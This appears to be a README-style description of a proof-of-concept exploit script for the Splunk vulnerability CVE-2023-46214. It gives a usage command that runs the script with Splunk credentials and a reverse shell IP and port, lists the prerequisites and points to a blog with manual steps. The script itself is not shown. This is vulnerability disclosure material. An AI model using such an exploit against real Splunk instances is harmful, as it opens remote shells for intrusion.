This article delves into a critical vulnerability in Splunk, identified as CVE-2023-46214. It provides a detailed analysis and a Proof of Concept (PoC) script to demonstrate the vulnerability’s exploitation. The script is designed for educational purposes, helping to understand the security implications of this vulnerability in Splunk, a popular data processing and analytics platform. The article emphasizes responsible usage, strictly for research and educational purposes, highlighting the potential risks and the necessary precautions to mitigate unauthorized access or misuse.
Usage
The Splunk instance URL, username, password, reverse shell IP, and port are all required as command-line parameters. For example:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>Prerequisites
- Splunk credentials with upload permission to adddatamethods
- Note: another vector might be possible, this is just what I used
- Splunk is not running on SHC mode
Analysis
I’ve written a blog post detailing the methodology taken to uncover this vulnerability. If you are running into any issues with the script, the blog could be helpful as it details the manual steps for exploitation.
